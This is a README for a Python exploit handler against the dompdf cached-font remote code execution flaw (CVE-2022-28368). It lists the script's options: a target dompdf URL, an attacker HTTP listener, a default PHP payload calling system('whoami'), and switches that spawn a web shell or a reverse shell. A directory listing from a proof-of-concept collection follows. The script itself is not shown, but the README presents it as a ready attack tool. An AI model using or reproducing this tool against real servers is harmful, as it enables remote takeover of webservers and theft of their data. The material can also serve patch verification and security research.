This repository contains a python script that will handle the majority of the dompdf cached font exploit (CVE-2022-28368), all you need to do is create the request# CVE-2022-28368-handler
This repository contains a python script that will handle the majority of the dompdf cached font exploit (CVE-2022-28368), all you need to do is create the request. It will even provide a trigger string to start the exploit :)
## Usage
```
usage: CVE-2022-28368.py [-h] -d DOMPDF_LOCATION [-f FONTNAME] -i HTTP_IP [-p HTTP_PORT] [-P PHP] [-w] [-r]
This script handles the majority of the dompdf cached font exploit (CVE-2022-28368), all you need to do is create the request
optional arguments:
-h, --help show this help message and exit
-d DOMPDF_LOCATION, --dompdf-location DOMPDF_LOCATION
dompdf location on target webserver (example: http://target.com/vendor/dompdf)
-f FONTNAME, --fontname FONTNAME
Exploit font name (default: expfont.php)
-i HTTP_IP, --http-ip HTTP_IP
HTTP listener IP
-p HTTP_PORT, --http-port HTTP_PORT
HTTP listener PORT (default: 80)
-P PHP, --php PHP PHP to execute (default: <?php system("whoami"); ?>)
-w, --webshell Spawn web shell
-r, --revshell Spawn reverse shell (Uses HTTP listener IP and port 9001 by default)
```
### See for technical details of the vulnerability:
https://positive.security/blog/dompdf-rce
https://github.com/positive-security/dompdf-rce
[4.0K] /data/pocs/3492e4c7857abc826b47e4fc841dd01a84aacc81
├── [4.3K] CVE-2022-28368.py
└── [1.3K] README.md
0 directories, 2 files